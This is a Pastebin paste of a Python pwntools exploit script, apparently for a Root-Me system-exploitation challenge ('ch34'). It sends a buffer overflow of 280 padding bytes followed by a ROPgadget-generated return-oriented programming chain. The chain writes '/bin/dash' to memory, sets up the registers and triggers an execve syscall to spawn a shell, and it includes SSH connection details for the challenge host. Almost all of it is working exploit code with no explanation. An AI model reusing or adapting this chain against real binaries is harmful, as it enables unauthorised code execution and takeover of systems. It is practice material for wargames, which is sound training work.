SHARE
TWEET

Untitled

a guest Oct 21st, 2019 117 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python2
  2. # execve generated by ROPgadget
  3. from pwn import *
  4. from struct import pack
  5. DEBUG = 1
  6. if DEBUG:
  7.     proc = process('./ch34')
  8. else:
  9.     s = ssh(host='challenge03.root-me.org',
  10.             user='app-systeme-ch34',
  11.             password='app-systeme-ch34',
  12.             port=2223)
  13.     proc = s.process('./ch34')
  14. # Padding goes here
  15. p = 'A'*280
  16. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  17. p += pack('<Q', 0x00000000006c0000) # @ .data
  18. p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
  19. p += '////////'
  20. p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
  21. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  22. p += pack('<Q', 0x00000000006c0008) # @ .data + 8
  23. p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
  24. p += 'bin/dash'
  25. p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
  26. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  27. p += pack('<Q', 0x00000000006c0010) # @ .data + 16
  28. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  29. p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
  30. p += pack('<Q', 0x00000000004016d3) # pop rdi ; ret
  31. p += pack('<Q', 0x00000000006c0000) # @ .data
  32. p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
  33. p += p64(0)
  34. p += pack('<Q', 0x0000000000437205) # pop rdx ; ret
  35. p += p64(0)
  36. p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
  37. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  38. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  39. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  40. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  41. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  42. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  43. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  44. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  45. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  46. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  47. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  48. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  49. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  50. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  51. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  52. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  53. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  54. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  55. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  56. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  57. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  58. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  59. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  60. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  61. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  62. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  63. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  64. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  65. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  66. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  67. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  68. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  69. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  70. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  71. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  72. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  73. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  74. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  75. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  76. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  77. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  78. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  79. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  80. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  81. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  82. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  83. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  84. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  85. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  86. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  87. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  88. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  89. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  90. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  91. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  92. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  93. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  94. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  95. p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
  96. p += pack('<Q', 0x000000000045b525) # syscall ; ret
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top